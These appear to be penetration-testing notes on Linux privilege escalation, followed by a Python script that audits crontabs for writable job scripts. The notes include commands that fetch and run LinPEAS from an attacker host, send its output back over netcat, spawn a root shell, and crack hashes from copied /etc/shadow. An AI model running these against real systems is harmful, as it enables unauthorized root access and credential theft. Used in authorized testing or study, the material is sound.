Privilege escalation
After exploitation - interesting commands
# Check installed FTP version
apt list --installed | grep ftp
# Check for locally open ports
netstat -antp | grep -i list
# Get SSH version on Linux
ssh -v localhost
# Get FTP daemon package version on Linux
dpkg -l pure-ftpd
# View OS related info
uname -a
lsb_release -a
LinPEAS
Using tools like linpeas.sh automates the enumeration process, making it more efficient and comprehensive.
Download LinPEAS from GitHub
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
Transfer LinPEAS to the victim's machine
# Local network
sudo python3 -m http.server 80 #Host
curl 10.10.10.10/linpeas.sh | sh #Victim
# Without curl
sudo nc -q 5 -lvnp 80 < linpeas.sh #Host
cat < /dev/tcp/10.10.10.10/80 | sh #Victim
Execute from memory and send output back to the host
nc -lvnp 9002 | tee linpeas.out #Host
curl 10.10.14.20:8000/linpeas.sh | sh | nc 10.10.14.20 9002 #Victim
Analyze the red findings
Go to GTFOBins
Type in the program that has the SUID bit set and try the listed techniques, for example for python with sudo:
python -c 'import os; os.system("/bin/sh")'
CVE-2021-3493 - Ubuntu kernel privilege escalation
Affected versions
Ubuntu 20.10
Ubuntu 20.04 LTS
Ubuntu 19.04
Ubuntu 18.04 LTS
Ubuntu 16.04 LTS
Ubuntu 14.04 ESM
If the target runs one of the Ubuntu versions listed above, it is affected by the OverlayFS privilege escalation vulnerability and the exploit below can be used against it:
You have to compile the exploit first (without -c, which would only produce an object file instead of a linked executable):
gcc -o exploit exploit.c
Shadow File
Copy /etc/passwd
Copy /etc/shadow
Merge the files with the unshadow tool
unshadow <passwdFile> <shadowFile> > <outputFileName>
Crack the password hashes offline with John the Ripper
john --wordlist=<wordlistFile> <UnshadowFile>
Dirty COW - CVE-2016-5195
Find all SUID executables (they run with the privileges of the file owner, usually root):
find / -perm -4000 -type f 2>/dev/null
Once identified, check GTFOBins for known techniques for each of them
Check the sudo privileges we might have as current user:
sudo -l
If we can execute a binary with root privileges, we can check on GTFOBins how that executable can be used to get root access
Check the crontabs
If we find an executable script that we can write to, we might use it to add users to /etc/sudoers
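Added example (not from these notes): a small Python audit that applies the crontab check above from the defender's side. It parses system-crontab job lines (/etc/crontab and /etc/cron.d format) and, for every absolute path a job executes, flags the script, or its parent directory, when group or other can write to it. The crontab text and the files created in a temporary directory are constructed sample data; the function names (parse_system_crontab, audit_crontab, run_demo) are my own.

```python
import os
import re
import tempfile
# System crontab job line (/etc/crontab, /etc/cron.d/*): five time fields or
# one @keyword, then the user the job runs as, then the command.
JOB = re.compile(r"^(?:@\S+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")
LOOSE = 0o022  # mode bits: writable by group or by other
# Constructed sample crontab: one clean job and three misconfigured ones.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
17 *  * * *  root      /etc/backup.sh --quiet
0  3  * * *  root      /opt/cleanup.sh
@reboot      root      /var/scripts/rotate.sh
*/5 * * * *  www-data  /usr/bin/php /var/www/job.php
"""
def parse_system_crontab(text):
    """Yield (user, command) per job, skipping blanks, comments and VAR=value lines."""
    for line in (l.strip() for l in text.splitlines()):
        if line and not line.startswith("#") and not re.match(r"\w+=", line):
            m = JOB.match(line)
            if m:
                yield m.group("user"), m.group("cmd")

def audit_crontab(text, root="/"):
    """Return [(user, path, reason)] for job paths whose file or parent dir is group/other writable."""
    findings = []
    for user, cmd in parse_system_crontab(text):
        for tok in cmd.split():
            real = os.path.join(root, tok.lstrip("/"))  # `root` re-bases paths for testing
            if not tok.startswith("/") or not os.path.isfile(real):
                continue  # not a path, or (e.g. the php interpreter) absent under root
            if os.stat(real).st_mode & LOOSE:
                findings.append((user, tok, "script writable by group/other"))
            elif os.stat(os.path.dirname(real)).st_mode & LOOSE:
                findings.append((user, tok, "directory writable by group/other"))
    return findings

def run_demo():
    """Create the constructed scripts SAMPLE_CRONTAB names in a temp dir, then audit."""
    modes = {"etc/backup.sh": 0o755, "opt/cleanup.sh": 0o777,           # clean, world-writable
             "var/scripts/rotate.sh": 0o755, "var/www/job.php": 0o664}  # (dir loose), group-writable
    with tempfile.TemporaryDirectory() as root:
        for rel, mode in modes.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            open(path, "w").close()  # empty stand-in script; only its mode matters
            os.chmod(path, mode)
        os.chmod(os.path.join(root, "var/scripts"), 0o777)  # script fine, directory loose
        return audit_crontab(SAMPLE_CRONTAB, root)
```

Run against the real system with audit_crontab(open("/etc/crontab").read()); a finding means a non-root user could alter what root executes on schedule, so fix ownership and strip group/other write bits.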